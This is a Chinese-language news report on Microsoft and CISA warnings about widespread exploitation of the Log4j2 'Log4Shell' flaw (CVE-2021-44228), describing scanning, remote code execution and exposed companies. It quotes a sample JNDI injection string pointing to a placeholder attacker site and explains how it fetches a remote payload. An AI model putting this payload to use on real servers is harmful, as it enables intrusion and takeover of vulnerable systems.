微軟再次發出了來自具有深厚背景的駭客組織的網路攻擊預警，可知問題源於 Java 日誌庫的 Log4j2 漏洞（CVE-2021-44228）。 這家雷德蒙德科技巨頭指出，世界多地的駭客已開始利用這項更複雜的日誌協議技術，來遠端訪問受害者的設備。 目前觀察到的大部分攻擊，主要涉及各路人馬的大規模掃描。

據悉，微軟旗下的多個威脅情報團隊 —— 包括 MSTIC 威脅情報中心、 Microsoft 365 Defender 威脅情報團隊、RiskIQ 和 DART 檢測回應團隊 —— 一直在密切關注 Apache Log4j2 的遠端代碼執行（RCE）漏洞。

CVE-2021-44228 漏洞披露公告指出，被稱作”Log4Shell”的漏洞攻擊，往往在 Web 日誌請求中包含如下字符串：

${jndi:ldap://[attacker site]/a}

美國網路安全和基礎設施安全域（CISA）也證實了微軟的說法，此前該機構同樣通報了Log4Shell漏洞的廣泛利用。

CISA 負責人 Jen Easterly 於昨日接受 CNN 採訪時重申，若不迅速採取補救措施，各個聯邦機構的設備、服務、乃至整個互聯網，都將處於一個相當可怕的境地。

微軟警告稱，Log4j2 的風險源於兩個方面。 其一是漏洞可被輕鬆利用，其二是基於其構建的產品數量 —— 而 Apache Log4j2 就是當前最流行的 Java 日誌庫之一。

據悉，日誌庫用於為開發者提供有關服務和產品的附加資訊，允許其控制在應用程式執行期間、用戶登錄特定服務 / 裝置的錯誤報告，並在遇到功能問題時收集相關數據。

通過日誌庫的使用，開發者還可深入瞭解或收集設備詳情，包括 CPU 類型 / GPU 型號、驅動程式版本、以及系統記憶體等。

攻擊者會對使用Log4j2生成日誌的目標系統執行 HTTP 請求，該日誌利用 JNDI 向攻擊者控制的網站執行請求，最終導致被利用的進程訪問網站並執行有效負載。

在許多觀察到的案例中，攻擊者往往拿到了 DNS 日誌系統的參數，旨在記錄對網站的請求、以對易受攻擊的系統進行指紋識別。

此前已知的一種漏洞利用，涉及微軟旗下的《我的世界》伺服器。 攻擊者以聊天框作為中部署的消息內容作為管道，試圖滲透用戶系統並奪得控制權。

事實上，全球許多知名企業都面臨著巨大的風險，其中不乏微軟、Twitter、蘋果、亞馬遜、百度、Cloudflare、網易、Cloudflare 等科技巨頭。

網路安全公司 Check Point 指出，截至目前，其 GitHub 專案的下載量已經超過 40 萬次。 遺憾的是，儘管 Apache 已經發佈了一個修補程式，但各家公司的實施方案不盡相同。

對於數百上千萬的客戶來說，這意味著他們仍將在未來一段時間里面臨Log4j入侵風險，或導致大量用戶數據暴露於在外。